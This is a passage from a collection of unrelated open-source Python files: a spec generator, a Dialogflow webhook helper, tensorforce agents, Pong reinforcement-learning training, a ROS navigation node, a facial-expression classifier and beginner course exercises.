input_template = args['input-template']
if not input_template:
input_template, errmsg = _get_default_template()
if not input_template:
print(errmsg)
return 1
output_filename = args['output']
if not output_filename:
if not input_template.endswith('.spec.j2'):
print("Failed to autodetect output file name. "
"Please specify using `-o/--output`.")
return 2
output_filename, _, _ = input_template.rpartition('.')
try:
epochs = _get_epochs(args['epochs'])
requirements = _get_requirements(args['requirements'])
except IOError as e:
print(e)
return 3
if output_filename and output_filename != '-':
output_path = os.path.abspath(output_filename)
else:
output_path = None
spec = generate_spec(args['spec_style'], epochs, requirements,
args['skip_pyversion'],
args['input_template_format'],
input_template, output_path)
if output_path:
print("Rendering: %s -> %s" % (input_template, output_path))
with open(output_path, "w") as o:
o.write(spec)
else:
print(spec)
return 0
if __name__ == '__main__':
sys.exit(main())
```
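As a sketch of how the pieces above fit together, `generate_spec` can be driven directly instead of going through `process_args`; the template path below is a placeholder.
```python
# Hypothetical direct call, bypassing the CLI (the template path is a placeholder).
spec_text = generate_spec(
    spec_style='suse',                # or 'fedora'
    epochs={},                        # pkg-name -> epoch mapping (see _get_epochs)
    requirements={},                  # pkg-name -> min-version mapping (see _get_requirements)
    skip_pyversion=None,              # e.g. 'py3' on CentOS 7 (see _get_default_pyskips)
    input_template_format='spec.j2',  # the only supported format
    input_template_path='example.spec.j2',
    output_path=None)
print(spec_text)
```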
|
{
"source": "jesusavf/pythonlibfordialogflow",
"score": 3
}
|
#### File: jesusavf/pythonlibfordialogflow/lib.py
```python
from flask import Flask, request, make_response, jsonify
import random
def msj(text):
return '{"fulfillmentText": "'+text+'", "fulfillmentMessages": [ { "text": { "text": [ "'+text+'" ] } } ]}'
def rndmsj(textx):
text=random.choice(textx)
return '{"fulfillmentText": "'+text+'", "fulfillmentMessages": [ { "text": { "text": [ "'+text+'" ] } } ]}'
def credenciales(user,passw,vuno,vdos):
if user==vuno:
if passw==vdos:
return True
else:
exit()
else:
exit()
def instancia(nombre):
req = request.get_json(force=True)
if req.get('queryResult').get('intent').get('displayName')==nombre:
return True
else:
return False
def acciones():
req = request.get_json(force=True)
if req.get('queryResult').get('action'):
return req.get('queryResult').get('action')
else:
return ''
def variable(nombre):
req = request.get_json(force=True)
if req.get('queryResult').get('parameters').get(nombre):
return req.get('queryResult').get('parameters').get(nombre)
else:
return ''
def origenes():
req = request.get_json(force=True)
if req.get("originalDetectIntentRequest").get("payload").get("source"):
return (req.get("originalDetectIntentRequest").get("payload").get("source").upper())
else:
frase = u'indefinido'
return frase.upper()
def texto():
req = request.get_json(force=True)
if req.get("queryResult").get("queryText"):
return req.get("queryResult").get("queryText")
else:
return ''
def imagen():
req = request.get_json(force=True)
if req.get("originalDetectIntentRequest").get("payload").get("data").get("message").get("attachments").get(0).get("payload").get("url"):
return req.get("originalDetectIntentRequest").get("payload").get("data").get("message").get("attachments").get(0).get("payload").get("url")
else:
return ''
def enviarimagenes(imagen,plataforma):
a='{"fulfillmentMessages":['
for img in imagen:
a=a+'{"image":{"imageUri":"'+img+'"},"platform":"'+plataforma+'"},'
a=a+'{"payload":{}}]}'
return a
def enviartarjetas(t,plataforma):
a='{"fulfillmentMessages": ['
con=1
for tit in t:
try:
a=a+'{"card": {"title": "'+tit[1]+'", "subtitle": "'+tit[2]+'", "imageUri": "'+tit[3]+'"'
a=a+', "buttons": [ { "text": "'+tit[0][0]+'"} '
con=2
a=a+', { "text": "'+tit[0][1]+'"} '
a=a+', { "text": "'+tit[0][1]+'"} '
a=a+']}, "platform": "'+plataforma+'"},'
except IndexError:
if con==1:
a=a+'}, "platform": "'+plataforma+'"},'
else:
a=a+']}, "platform": "'+plataforma+'"},'
a=a+'{"payload":{}}]}'
return a
def enviarrespuestasrapidas(repuestas,plataforma):
a='{ "fulfillmentMessages": [ { "quickReplies": { "title": "'+repuestas['titulo'][0]+'", "quickReplies": ['
b=repuestas['boton']
d=''
for c in b:
if d=='':
d=d+'"'+c+'"'
else:
d=d+',"'+c+'"'
a=a+d+']},"platform": "'+plataforma+'"},{"payload":{}}]}'
return a
```
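These helpers assume they run inside a Flask view handling a Dialogflow webhook POST, using the imports at the top of lib.py. A minimal sketch of such a route follows; the app, URL, and intent name are invented for illustration and are not part of the original library.
```python
# Hypothetical webhook wiring for the helpers above (route and intent name are illustrative).
app = Flask(__name__)

@app.route('/webhook', methods=['POST'])
def webhook():
    if instancia('saludo'):  # did Dialogflow match the 'saludo' intent?
        return make_response(msj('Hola, dijiste: ' + texto()))
    return make_response(rndmsj(['No entendi', 'Repite por favor']))
```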
|
{
"source": "jesuscast/tensorforce-clone",
"score": 2
}
|
#### File: tensorforce/agents/memory_agent.py
```python
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from six.moves import xrange
from tensorforce.agents import Agent
from tensorforce.core.memories import Memory
class MemoryAgent(Agent):
"""
The `MemoryAgent` class implements a replay memory from
which it samples batches to update the value function.
"""
def __init__(
self,
states_spec,
actions_spec,
preprocessing,
exploration,
reward_preprocessing,
batched_observe,
batch_size,
memory,
first_update,
update_frequency,
repeat_update
):
self.memory_spec = memory
self.batch_size = batch_size
self.first_update = first_update
self.update_frequency = update_frequency
self.repeat_update = repeat_update
super(MemoryAgent, self).__init__(
states_spec=states_spec,
actions_spec=actions_spec,
preprocessing=preprocessing,
exploration=exploration,
reward_preprocessing=reward_preprocessing,
batched_observe=batched_observe
)
self.memory = Memory.from_spec(
spec=self.memory_spec,
kwargs=dict(
states_spec=self.states_spec,
actions_spec=self.actions_spec
)
)
def observe(self, terminal, reward):
super(MemoryAgent, self).observe(terminal=terminal, reward=reward)
self.memory.add_observation(
states=self.current_states,
internals=self.current_internals,
actions=self.current_actions,
terminal=self.current_terminal,
reward=self.current_reward
)
if self.timestep >= self.first_update and self.timestep % self.update_frequency == 0:
for _ in xrange(self.repeat_update):
batch = self.memory.get_batch(batch_size=self.batch_size, next_states=True)
loss_per_instance = self.model.update(
states=batch['states'],
internals=batch['internals'],
actions=batch['actions'],
terminal=batch['terminal'],
reward=batch['reward'],
return_loss_per_instance=True
)
self.memory.update_batch(loss_per_instance=loss_per_instance)
def import_observations(self, observations):
"""Load an iterable of observation dicts into the replay memory.
Args:
observations: An iterable with each element containing an observation. Each
observation requires keys 'states', 'actions', 'reward', 'terminal', 'internals'.
Use an empty list [] for 'internals' if internal state is irrelevant.
Returns:
"""
for observation in observations:
self.memory.add_observation(
states=observation['states'],
internals=observation['internals'],
actions=observation['actions'],
terminal=observation['terminal'],
reward=observation['reward']
)
```
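A sketch of the observation format `import_observations` expects, matching the plural keys read in the loop above; the agent instance and the state/action values are placeholders.
```python
# Placeholder observations matching the keys consumed by import_observations above.
observations = [
    {'states': {'state': [0.0]}, 'internals': [], 'actions': {'action': 0},
     'terminal': False, 'reward': 0.0},
    {'states': {'state': [1.0]}, 'internals': [], 'actions': {'action': 1},
     'terminal': True, 'reward': 1.0},
]
agent.import_observations(observations)  # agent: some configured MemoryAgent subclass
```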
#### File: tensorforce/models/q_nstep_model.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorforce import util
from tensorforce.models import QModel
class QNstepModel(QModel):
"""
Deep Q-network using n-step rewards as described in "Asynchronous Methods for Deep Reinforcement Learning".
"""
def tf_q_delta(self, q_value, next_q_value, terminal, reward):
for _ in range(util.rank(q_value) - 1):
terminal = tf.expand_dims(input=terminal, axis=1)
reward = tf.expand_dims(input=reward, axis=1)
multiples = (1,) + util.shape(q_value)[1:]
terminal = tf.tile(input=terminal, multiples=multiples)
reward = tf.tile(input=reward, multiples=multiples)
reward = self.fn_discounted_cumulative_reward(
terminal=terminal,
reward=reward,
discount=self.discount,
final_reward=next_q_value[-1]
)
return reward - q_value
```
|
{
"source": "jesuscfv/friction_less",
"score": 3
}
|
#### File: src/obj/physicalobject.py
```python
import pyglet
class PhysicalObject(pyglet.sprite.Sprite):
def __init__(self, *args, **kwargs):
super(PhysicalObject, self).__init__(*args, **kwargs)
# Velocities
self.v_x, self.v_y = 0.0, 0.0
# Positions
# self.x, self.y = 0.0, 0.0
def update(self, dt):
"""This method should be called every frame."""
# Update position according to velocity and time
self.x += self.v_x * dt
self.y += self.v_y * dt
```
|
{
"source": "jesuschm/tasca",
"score": 3
}
|
#### File: domain/users/user.py
```python
import uuid
from dataclasses import dataclass, asdict, field
@dataclass
class User():
username: str
id: uuid.UUID = field(default_factory=uuid.uuid4)
follows: list = field(default_factory=list)
@classmethod
def from_dict(cls, d):
    return cls(**d) if isinstance(d, dict) else None
def to_dict(self):
return asdict(self)
def add_follow(self, follow_user_id):
self.follows.append(follow_user_id)
```
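A small round-trip sketch for the dataclass above; the username and followed id are arbitrary.
```python
# Round-trip illustration for the User dataclass (values are arbitrary).
alice = User(username='alice')
alice.add_follow(uuid.uuid4())
as_dict = alice.to_dict()       # plain dict with 'username', 'id' and 'follows'
same = User.from_dict(as_dict)  # rebuilds a User from that dict
```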
#### File: tasca/src/tasca.py
```python
import sys
import logging
from application.commands_service import post, read, follow, wall
from infra.databases.mongo import MongoRepository
_repo = MongoRepository()
_verbose = False
def main():
try:
command = None
if _repo.client:
logging.info("[+] Hello friend! Welcome to the Tasca. Get fun! ")
logging.info("[+] Control + C to exit.\n")
while command != "^C":
try:
command = str(input("> "))
# Posting command
if '->' in command:
data = command.split(" -> ")
if len(data) == 2:
post(_repo, username = data[0], message = data[1])
else:
logging.error("[-] Bad post command. Correct format: [username] -> [message].")
elif 'follows' in command:
data = command.split(" follows ")
if len(data) == 2:
user = data[0]
follow_user = data[1]
rc = follow(_repo, username = user, follow_username = follow_user)
if rc:
logging.debug(f"[+] {user} is now following {follow_user}.")
else:
logging.error(f"[-] Error trying to follow {follow_user}")
else:
logging.error("[-] Bad follow command. Correct format: [username] -> [username].")
elif 'wall' in command:
data = command.split(" wall")
if len(data) == 2 and data[1] == '':
wall(_repo, username = data[0])
else:
logging.error("[-] Bad wall command. Correct format: [username] wall.")
else:
data = command.split(" ")
if len(data) == 1:
read(_repo, username = command)
else:
logging.error("[-] Bad username to read. Usernames don't contain spaces.")
except Exception as e:
logging.error(f"[-] Error: {e}.")
else:
raise("Database not connected.")
except KeyboardInterrupt:
logging.info(f"\n[+] Quitting.. Bye!")
sys.exit(0)
except Exception as e:
logging.error(f"[-] Error: {e}. Quitting.")
sys.exit(1)
if __name__ == "__main__":
"""Entry point
"""
main()
```
|
{
"source": "jesuscol96/WebClassApp",
"score": 2
}
|
#### File: WebClassApp/categorias/views.py
```python
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.urls import reverse
from .models import Categories
from django.http import JsonResponse
from rest_framework.renderers import JSONRenderer
from rest_framework.parsers import JSONParser
from .serializers import *
# Create your views here.
def index(request):
if request.user.is_authenticated:
username = request.user.username
is_superuser = request.user.is_superuser
else:
username = 'none'
is_superuser = False
categorias = Categories.objects.all()
context = {
'is_user': request.user.is_authenticated,
'username': username,
'is_superuser' : is_superuser,
'categorias': categorias
}
return render(request,'categorias/index.html',context)
@login_required
def crear_categoria(request):
return render(request,'categorias/crear_categorias.html')
def delete_category(request,pk):
categoria = get_object_or_404(Categories,pk=pk)
if request.method == 'POST': # If method is POST,
categoria.delete() # delete the category.
return HttpResponseRedirect(reverse('categorias:index'))
return render(request,'categorias/index.html')
def process_new_categories(request):
name = request.POST['name']
description = request.POST['description']
categoria= Categories(name=name,description=description,view_count=1)
categoria.save()
return HttpResponseRedirect(reverse('categorias:index'))
def ver_categoria(request,categoria_id):
if request.user.is_authenticated:
username = request.user.username
is_superuser = request.user.is_superuser
else:
username = 'none'
is_superuser = False
categoria=Categories.objects.get(id=categoria_id)
context = {
'is_user': request.user.is_authenticated,
'username': username,
'is_superuser' : is_superuser,
'categoria': categoria
}
return render(request,'categorias/ver_categoria.html',context)
#For flutter
def index_flutter(request):
if request.user.is_authenticated:
username = request.user.username
is_superuser = request.user.is_superuser
else:
username = 'none'
is_superuser = False
categorias = Categories.objects.all()
categorias = CategoriesSerializer(categorias,many=True)
context = {
'is_user': request.user.is_authenticated,
'username': username,
'is_superuser' : is_superuser,
'categorias': categorias.data
}
return JsonResponse(context,safe=False)
def delete_category_flutter(request):
pk = int(request.POST['pk'])
categoria = Categories.objects.filter(pk=pk)
if len(categoria) > 0:
categoria.first().delete()
return JsonResponse({'success': True},safe=False)
else:
return JsonResponse({'success': False},safe=False)
def process_new_categories_flutter(request):
name = request.POST['name']
description = request.POST['description']
categoria= Categories(name=name,description=description,view_count=1)
categoria.save()
return JsonResponse({'success': True})
def ver_categoria_flutter(request):
pk = int(request.POST['pk'])
if request.user.is_authenticated:
username = request.user.username
is_superuser = request.user.is_superuser
else:
username = 'none'
is_superuser = False
categoria=Categories.objects.filter(id=pk)
if len(categoria) > 0:
is_empty = False
else:
is_empty = True
categoria = CategoriesSerializer(categoria,many=True)
context = {
'is_user': request.user.is_authenticated,
'username': username,
'is_superuser' : is_superuser,
'categoria': categoria.data,
'is_empty': is_empty,
}
return JsonResponse(context,safe=False)
```
#### File: management/commands/seed.py
```python
from django.core.management.base import BaseCommand
from mainpage.models import Roles
# import UserFactory here
roles = ['Student','Instructor']
class Command(BaseCommand):
help = 'Seeds the database.'
def handle(self, *args, **options):
print('Seeding...')
for role in roles:
d = Roles(name=role)
d.save()
print('Roles have been seeded.')
```
|
{
"source": "JesusContrerasPacheco/IA_Recognition_Expressions",
"score": 3
}
|
#### File: JesusContrerasPacheco/IA_Recognition_Expressions/predict3.py
```python
import os
import numpy as np
import cv2 as cv2
import glob
from sklearn.multiclass import OneVsRestClassifier
from sklearn.svm import SVC
import pickle
import pandas as pd
data = { 'ID':[], 'USER': [], 'PREDICT': [] }
path = 'E:/UPC/Inteleigencia Artificial/IA_Recognition_Expressions-main/'
path_img = 'E:/UPC/Inteleigencia Artificial/IA_Recognition_Expressions-main/testImages/'
#rutimg = str(input("Coloca la ruta de la imagen:"))
files_names = os.listdir(path_img)
#print(files_names)
# def returnLocalizedFace(img):
# face_cascade = cv2.CascadeClassifier(path + 'classifiers/haarcascade_frontalface_default.xml')
# gray =cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# faces = face_cascade.detectMultiScale(gray, 1.3, 5)
# for (x, y, w, h) in faces:
# # roi_gray = gray[y:y + h, x:x + w]
# # roi_color = img[y:y + h, x:x + w]
# if len(faces) == 0:
# return img
# crop_img = img[y:y + h, x:x + w]
# return crop_img
def getImage(path_img):
return cv2.imread(path_img)
# for files_name in files_names:
# image = cv2.imread(path_img +"/"+files_name)
# return image
#print(getImage(path_img))
def show(img):
cv2.imshow('im', img)
# cv2.waitKey(0)
X = []
y = []
def read(imageFolder, label):
for filename in glob.glob(path + "images/" + imageFolder + '/*.*'):
win_size = (64, 128)
img = getImage(filename)
win_size = (64, 128)
img = cv2.resize(img, win_size)
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
d = cv2.HOGDescriptor()
hog = d.compute(img)
X.append(hog.transpose()[0])
y.append(label)
# def fromIndexToFeatures(X, indecies):
# features = []
# for i in indecies:
# features.append(X[i])
# return np.asarray(features)
# def fromIndexToLabels(y, indecies):
# labels = []
# for i in indecies:
# labels.append(y[i])
# return np.asarray(labels)
def openModal(img):
image_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
face_cascade = cv2.CascadeClassifier(path + "classifiers/haarcascade_frontalface_alt2.xml")
faces = face_cascade.detectMultiScale(image_gray)
landmark_detector = cv2.face.createFacemarkLBF()
landmark_detector.loadModel(path + "classifiers/LFBmodel.yaml")
_, landmarks = landmark_detector.fit(image_gray, faces)
for landmark in landmarks:
for x,y in landmark[0]:
cv2.circle(img, (int(x), int(y)), 1, (255, 255, 255), 1)
# show(img)
read('HAPPY',0)
read('CONTEMPT',1)
read('ANGER',2)
read('DISGUST',3)
read('FEAR',4)
read('SADNESS',5)
read('SURPRISE',6)
read('NEUTRAL',7)
classes = ["HAPPY", "CONTEMPT", "ANGER", "DISGUSTADO", "FEAR", "SADNESS", "SURPRISE", "NEUTRAL"]
y = np.asarray(y)
X = np.asarray(X)
clf = OneVsRestClassifier(SVC(kernel='linear', probability=True, tol=1e-3))
clf.fit(X, y)
filename = 'finalized_model.sav'
pickle.dump(clf, open(filename, 'wb'))
clf = pickle.load(open(filename, 'rb'))
#img = getImage(path_img)
#path + 'testImages/angry.jpg'
# points
#print (img)
win_size = (64, 128)
"""
img = cv2.resize(img, win_size)
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
d = cv2.HOGDescriptor()
hog = d.compute(img)
hog = hog.transpose()[0]
hog = np.asarray(hog)
print(hog)
"""
id = 0
for files_name in files_names:
#print(files_name)
id = id +1
data["ID"].append(id)
data["USER"].append(files_name)
image_path = path_img + files_name
img = getImage(image_path)
if img is None:
continue
# openModal(img)
# show(img)
img = cv2.resize(img, win_size)
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
d = cv2.HOGDescriptor()
hog = d.compute(img)
hog = hog.transpose()[0]
hog = np.asarray(hog)
print(hog)
result = classes[clf.predict([hog])[0]]
print("Result: " + result)
data["PREDICT"].append(result)
cv2.waitKey(0)
cv2.destroyAllWindows()
df = pd.DataFrame(data, columns = ['ID', 'USER', 'Nivel Sentimiento(+)' ,'Nivel Sentimiento(-)', 'PREDICT'])
df.to_excel(path + "export.xlsx", index = False, header=True)
```
#### File: JesusContrerasPacheco/IA_Recognition_Expressions/predict.py
```python
import numpy as np
import cv2 as cv2
import glob
from sklearn.multiclass import OneVsRestClassifier
from sklearn.svm import SVC
import pickle
path = 'D:/UPC/2021 - 1/IA/proyecto/IA_Recognition_Expressions/'
# def returnLocalizedFace(img):
# face_cascade = cv2.CascadeClassifier(path + 'classifiers/haarcascade_frontalface_default.xml')
# gray =cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# faces = face_cascade.detectMultiScale(gray, 1.3, 5)
# for (x, y, w, h) in faces:
# # roi_gray = gray[y:y + h, x:x + w]
# # roi_color = img[y:y + h, x:x + w]
# if len(faces) == 0:
# return img
# crop_img = img[y:y + h, x:x + w]
# return crop_img
def getImage(path):
return cv2.imread(path)
def show(img):
cv2.imshow('im', img)
# cv2.waitKey(0)
X = []
y = []
def read(imageFolder, label):
for filename in glob.glob(path + "images/" + imageFolder + '/*.*'):
win_size = (64, 128)
img = getImage(filename)
win_size = (64, 128)
img = cv2.resize(img, win_size)
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
d = cv2.HOGDescriptor()
hog = d.compute(img)
X.append(hog.transpose()[0])
y.append(label)
# def fromIndexToFeatures(X, indecies):
# features = []
# for i in indecies:
# features.append(X[i])
# return np.asarray(features)
# def fromIndexToLabels(y, indecies):
# labels = []
# for i in indecies:
# labels.append(y[i])
# return np.asarray(labels)
def openModal(img):
image_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
face_cascade = cv2.CascadeClassifier(path + "classifiers/haarcascade_frontalface_alt2.xml")
faces = face_cascade.detectMultiScale(image_gray)
landmark_detector = cv2.face.createFacemarkLBF()
landmark_detector.loadModel(path + "classifiers/LFBmodel.yaml")
_, landmarks = landmark_detector.fit(image_gray, faces)
for landmark in landmarks:
for x,y in landmark[0]:
cv2.circle(img, (int(x), int(y)), 1, (255, 255, 255), 1)
show(img)
read('HAPPY',0)
read('CONTEMPT',1)
read('ANGER',2)
read('DISGUST',3)
read('FEAR',4)
read('SADNESS',5)
read('SURPRISE',6)
read('NEUTRAL',7)
classes = ["HAPPY", "CONTEMPT", "ANGER", "DISGUST", "FEAR", "SADNESS", "SURPRISE", "NEUTRAL"]
y = np.asarray(y)
X = np.asarray(X)
clf = OneVsRestClassifier(SVC(kernel='linear', probability=True, tol=1e-3))
clf.fit(X, y)
filename = 'finalized_model.sav'
pickle.dump(clf, open(filename, 'wb'))
clf = pickle.load(open(filename, 'rb'))
img = getImage(path + 'testImages/happy2.PNG')
# points
openModal(img)
win_size = (64, 128)
img = cv2.resize(img, win_size)
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
d = cv2.HOGDescriptor()
hog = d.compute(img)
hog = hog.transpose()[0]
hog = np.asarray(hog)
print(hog)
print("Result: " + classes[clf.predict([hog])[0]])
cv2.waitKey(0)
```
|
{
"source": "jesuscopado/RL-pong-project",
"score": 3
}
|
#### File: test_agents/PGAgent/agent.py
```python
import numpy as np
import torch
import torch.nn.functional as F
from torch.distributions import Categorical
from utils import discount_rewards
class PolicyConv(torch.nn.Module):
def __init__(self, action_space, hidden=64):
super().__init__()
self.action_space = action_space
self.hidden = hidden
self.conv1 = torch.nn.Conv2d(2, 32, 3, 2)
self.conv2 = torch.nn.Conv2d(32, 64, 3, 2)
self.conv3 = torch.nn.Conv2d(64, 128, 3, 2)
self.reshaped_size = 128 * 11 * 11
self.fc1 = torch.nn.Linear(self.reshaped_size, self.hidden)
self.fc2_mean = torch.nn.Linear(self.hidden, action_space)
self.init_weights()
def init_weights(self):
for m in self.modules():
if type(m) is torch.nn.Linear:
torch.nn.init.uniform_(m.weight)
torch.nn.init.zeros_(m.bias)
elif type(m) is torch.nn.Conv2d:
torch.nn.init.xavier_normal_(m.weight.data)
if m.bias is not None:
torch.nn.init.normal_(m.bias.data)
def forward(self, x):
x = self.conv1(x)
x = F.relu(x)
x = self.conv2(x)
x = F.relu(x)
x = self.conv3(x)
x = F.relu(x)
x = x.reshape(-1, self.reshaped_size)
x_ac = self.fc1(x)
x_ac = F.relu(x_ac)
x_mean = self.fc2_mean(x_ac)
x_probs = F.softmax(x_mean, dim=-1)
dist = Categorical(x_probs)
return dist
class Agent(object):
def __init__(self, train_device="cuda"):
self.train_device = train_device
self.policy = PolicyConv(3, 128).to(self.train_device)
self.optimizer = torch.optim.RMSprop(self.policy.parameters(), lr=5e-3)
self.gamma = 0.99
self.batch_size = 100
self.prev_obs = None
self.states = []
self.log_act_probs = []
self.rewards = []
def replace_policy(self):
self.old_policy.load_state_dict(self.policy.state_dict())
def get_action(self, observation, evaluation=False):
x = self.preprocess(observation).to(self.train_device)
dist = self.policy.forward(x)
if evaluation:
action = torch.argmax(dist.probs)
else:
action = dist.sample()
# Calculate the log probability of the action
log_act_prob = -dist.log_prob(action) # negative in order to perform gradient ascent
return action.item(), log_act_prob
def episode_finished(self, episode_number):
log_act_probs = torch.stack(self.log_act_probs, dim=0)\
.to(self.train_device).squeeze(-1)
rewards = torch.stack(self.rewards, dim=0)\
.to(self.train_device).squeeze(-1)
self.states, self.log_act_probs, self.rewards = [], [], []
# Compute discounted rewards and normalize them to zero mean and unit variance
discounted_rewards = discount_rewards(rewards, self.gamma)
discounted_rewards -= torch.mean(discounted_rewards)
discounted_rewards /= torch.std(discounted_rewards)
weighted_probs = log_act_probs * discounted_rewards
loss = torch.mean(weighted_probs)
loss.backward()
self.reset()
if (episode_number+1) % self.batch_size == 0:
self.update_policy()
def update_policy(self):
self.optimizer.step()
self.optimizer.zero_grad()
def reset(self):
self.prev_obs = None
def get_name(self):
return "PGAgent"
def load_model(self):
weights = torch.load("model.mdl")
self.policy.load_state_dict(weights, strict=False)
def preprocess(self, observation):
observation = observation[::2, ::2].mean(axis=-1)
observation = np.expand_dims(observation, axis=-1)
if self.prev_obs is None:
self.prev_obs = observation
stack_ob = np.concatenate((self.prev_obs, observation), axis=-1)
stack_ob = torch.from_numpy(stack_ob).float().unsqueeze(0)
stack_ob = stack_ob.transpose(1, 3)
self.prev_obs = observation
return stack_ob
def store_outcome(self, observation, log_act_prob, action_taken, reward, done):
self.states.append(observation)
self.log_act_probs.append(log_act_prob)
self.rewards.append(torch.tensor([float(reward)]))
```
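`discount_rewards` is imported from a `utils` module that is not included in this dump. A plausible stand-in, assuming the usual discounted-return recursion over a 1-D reward tensor, might look like this; it is a guess at the helper's behavior, not the project's actual code.
```python
import torch

def discount_rewards(r, gamma):
    # Assumed behavior: G_t = r_t + gamma * G_{t+1}, computed backwards over a 1-D tensor.
    discounted = torch.zeros_like(r)
    running = 0.0
    for t in reversed(range(len(r))):
        running = r[t] + gamma * running
        discounted[t] = running
    return discounted
```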
#### File: jesuscopado/RL-pong-project/train_ppo.py
```python
import argparse
import time
import gym
import torch
import numpy as np
from DaBomb.agent import Agent as PPOAgent
from utils import save_plot
import wimblepong
# Make the environment
env = gym.make("WimblepongVisualSimpleAI-v0")
# Set up the player here. We used the SimpleAI that does not take actions for now
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
player = PPOAgent(device)
def train(episodes_batch=200, iterations=100000, max_timesteps=190000,
render=False, resume=False, full_print=True):
if resume:
player.load_model(evaluation=False)
print("Training for {} started!".format(player.get_name()))
win_ratio_history, average_win_ratio_history = [], [] # within the batch of episodes
wins, total_episodes = 0, 0
start_time = time.time()
reward_sum_running_avg = None
for it in range(iterations):
stack_obs_history, action_history, action_prob_history, reward_history = [], [], [], []
for ep in range(episodes_batch):
obs1 = env.reset()
player.reset()
total_episodes += 1
for t in range(max_timesteps):
if render:
env.render()
with torch.no_grad():
action1, action_prob1, stack_obs = player.get_action(obs1, evaluation=False)
obs1, reward1, done, info = env.step(action1)
stack_obs_history.append(stack_obs)
action_history.append(player.revert_action_convertion(action1))
action_prob_history.append(action_prob1)
reward_history.append(reward1)
if done:
wins = wins + 1 if reward1 == 10 else wins
if full_print:
reward_sum = sum(reward_history[-t:])
if reward_sum_running_avg:
reward_sum_running_avg = 0.99 * reward_sum_running_avg + 0.01 * reward_sum
else:
reward_sum_running_avg = reward_sum
print('Iteration %d, Episode %d (%d timesteps) - '
'last_action: %d, last_action_prob: %.2f, result: %s, running_avg: %.2f' %
(it, ep, t, action1, action_prob1,
"¡¡VICTORY!!" if reward1 == 10 else "defeat", reward_sum_running_avg))
break
player.update_policy(stack_obs_history, action_history, action_prob_history, reward_history)
# Bookkeeping (mainly for generating plots)
win_ratio = int((wins / episodes_batch) * 100)
win_ratio_history.append(win_ratio)
avg = np.mean(win_ratio_history[-100:])
average_win_ratio_history.append(avg)
print("Total episodes: {}. Win ratio (last episodes batch): {}%. Average win ratio: {}%".format(
total_episodes, win_ratio, round(float(avg), 2)))
wins = 0
if it % 10 == 0:
player.save_model(it)
save_plot(win_ratio_history, average_win_ratio_history, player.get_name(), episodes_batch, it)
elapsed_time_min = round((time.time() - start_time) / 60, 2)
player.save_model(it)
save_plot(win_ratio_history, average_win_ratio_history, player.get_name(), episodes_batch)
print("Training finished in %f minutes." % elapsed_time_min)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--resume", action="store_true", help="Resume training.")
args = parser.parse_args()
train(resume=True if args.resume else False)
```
|
{
"source": "JesusCoyotzi/SparseMapper",
"score": 2
}
|
#### File: sparse_map_server/scripts/navGoal.py
```python
import rospy
from geometry_msgs.msg import PoseStamped
from geometry_msgs.msg import PoseWithCovarianceStamped
from geometry_msgs.msg import Point
from nav_msgs.msg import Path
from nav_msgs.srv import GetPlan
start = PoseStamped()
def goalCallback(msg):
goal = msg
try:
goalProxy = rospy.ServiceProxy("/move_base/make_plan", GetPlan)
        pth = goalProxy(start, goal, 0.3)
        print("NavStack path planning successful")
for p in pth.plan.poses:
print((p.pose.position.x,p.pose.position.y,p.pose.position.z))
except rospy.ServiceException as e:
print("Service call failed %s"%e)
def startCallBack(msg):
global start
start = PoseStamped(msg.header,msg.pose.pose)
#print(msg)
def setup():
rospy.init_node("goal_emitter", anonymous=False)
rospy.Subscriber("/move_base_simple/goal", PoseStamped, goalCallback)
rospy.Subscriber("/initialpose", PoseWithCovarianceStamped, startCallBack)
rospy.wait_for_service("/move_base/make_plan")
rospy.spin()
if __name__ == '__main__':
setup()
```
|
{
"source": "JesusCuentasVillanueva/curso_profesional_python",
"score": 4
}
|
#### File: JesusCuentasVillanueva/curso_profesional_python/division_by.py
```python
def division_by(a):
def numero(b):
assert type(b) == int, "Error, debes usar numeros enteros"
return b//a
return numero
def run():
division_by_3 = division_by(3)
print(division_by_3(18))
division_by_5 = division_by(5)
print(division_by_5(100))
division_by_18 = division_by(18)
print(division_by_18(54))
#error_prueba = division_by(10)
#print(error_prueba(100.2))
if __name__ == "__main__":
run()
```
#### File: JesusCuentasVillanueva/curso_profesional_python/primo.py
```python
def primo(numero: int) -> bool:
divisores = []
    for divisor in range(1, numero + 1):
        if numero % divisor == 0:
            divisores.append(divisor)
if len(divisores)>2 or numero==1:
return False
else:
return True
def main():
numero = int(input("Introduce un número: "))
resultado = primo(numero)
if resultado == True:
print(f"El numero {numero} es primo")
else:
print(f"El numero {numero} NO es primo")
if __name__ == "__main__":
main()
```
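The `primo` function above collects every divisor of `numero`, which makes each check O(n). A sketch of an equivalent test that only tries divisors up to the square root is shown below; the function name `es_primo_rapido` is hypothetical and not part of the course files:

```python
def es_primo_rapido(numero: int) -> bool:
    # 0, 1 and negative numbers are not prime; 2 is the only even prime.
    if numero < 2:
        return False
    if numero % 2 == 0:
        return numero == 2
    # Only odd divisors up to sqrt(numero) need to be tested.
    divisor = 3
    while divisor * divisor <= numero:
        if numero % divisor == 0:
            return False
        divisor += 2
    return True
```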
#### File: JesusCuentasVillanueva/curso_profesional_python/sets.py
```python
def remove_duplicates(some_list):
without_duplicates = []
for element in some_list:
if element not in without_duplicates:
without_duplicates.append(element)
return without_duplicates
def remove_duplicates_with_sets(some_list):
return list(set(some_list))
def run():
random_list = [1, 2, 2, 2, 3, "Platzi", "Platzi", True, 4.6, False]
print(remove_duplicates_with_sets(random_list))
    # INTERESTING:
    # True is not printed in the result because Python treats True as 1, and since 1 is already in the set it is omitted.
    # For Python, True is the same as 1 (True == 1)
if __name__ == '__main__':
run()
```
